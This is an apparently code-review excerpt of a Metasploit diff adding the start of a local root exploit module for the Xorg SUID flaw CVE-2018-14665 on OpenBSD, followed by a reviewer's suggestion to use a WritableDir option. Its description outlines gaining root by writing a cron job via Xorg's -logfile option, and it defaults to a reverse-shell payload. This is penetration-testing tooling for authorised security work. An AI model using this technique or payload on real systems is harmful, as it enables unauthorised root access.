modules/exploits/openbsd/local/xorg_x11_suid_server.rb

```diff
@@ -0,0 +1,173 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = GoodRanking
+
+  include Msf::Post::File
+  include Msf::Exploit::FileDropper
+  include Msf::Post::Linux::Priv
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Xorg X11 Server SUID privilege escalation',
+      'Description'    => %q{
+        This module attempts to gain root privileges with SUID Xorg X11 server
+        versions prior to 1.20.3.
+
+        A permission check flaw exists for -modulepath and -logfile options when
+        starting Xorg versions 1.19.0 < 1.20.3.  This allows unprivileged users
+        that start the server the ability to elevate privileges and run
+        arbitrary code under root privileges.
+
+        This module writes a cron job using the Xorg -logfile option. The job
+        will run a small script to launch a payload. It has been tested with
+        OpenBSD 6.3,6.4 and CentOS 7.  Xorg must have SUID permissions. Success
+        on CentOS depends on the session having console for starting Xorg
+        along with selinux settings, may work but is currently not supported.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Narendra Shinde', # Discovery and exploit
+          'Raptor - 0xdea',  # Modified exploit for cron
+          'Aaron Ringo'      # Metasploit module
+        ],
+      'DisclosureDate' => 'Oct 25 2018',
+      'References'     =>
+        [
+           [ 'CVE', '2018-14665' ],
+           [ 'BID', '105741' ],
+           [ 'URL', 'https://www.securepatterns.com/2018/10/cve-2018-14665-xorg-x-server.html' ],
+           [ 'URL', 'https://github.com/0xdea/exploits/blob/master/openbsd/raptor_xorgasm' ]
+        ],
+      'Platform'       =>  %w(linux unix openbsd),
+      'Arch'           =>    ARCH_CMD,
+      'SessionTypes'   =>    'shell',
+      'Targets'        =>
+        [
+           ['OpenBSD', {
+            'Platform' => 'unix',
+            'Arch' => [ ARCH_CMD ] } ]
+        ],
+      'DefaultOptions' =>
+        {
+          'PAYLOAD' => 'cmd/unix/reverse_openssl'
+        },
+
+      'DefaultTarget'  => 0))
+    register_options(
+      [
+        OptString.new('SCRIPT', [ true, 'Dir for crontab script', '/tmp/' ]),
```

Comment:
As it doesn't really matter where this file gets written, so long as the directory is writable, the traditional approach is to register a `WritableDir` advanced option:

```ruby
    register_advanced_options [
      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
    ]
```